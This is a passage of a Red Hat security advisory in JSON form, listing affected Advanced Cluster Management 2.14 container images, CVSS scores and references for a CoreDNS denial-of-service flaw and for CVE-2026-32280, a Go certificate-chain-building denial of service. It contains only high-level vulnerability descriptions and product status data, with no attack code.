"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/coredns/coredns: CoreDNS: Denial of Service vulnerability due to predictable pseudo-random number generation"
},
{
"cve": "CVE-2026-32280",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-04-08T02:01:19.572351+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2456339"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Go standard library packages `crypto/x509` and `crypto/tls`. During the process of building a certificate chain, an attacker can provide a large number of intermediate certificates. This excessive input is not properly limited, leading to an uncontrolled amount of work being performed. This can result in a denial of service (DoS) condition, making the affected system or application unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-32280"
},
{
"category": "external",
"summary": "RHBZ#2456339",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456339"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-32280",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32280"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32280"
},
{
"category": "external",
"summary": "https://go.dev/cl/758320",
"url": "https://go.dev/cl/758320"
},
{
"category": "external",
"summary": "https://go.dev/issue/78282",
"url": "https://go.dev/issue/78282"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
"url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4947",
"url": "https://pkg.go.dev/vuln/GO-2026-4947"
}
],
"release_date": "2026-04-08T01:06:58.595000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
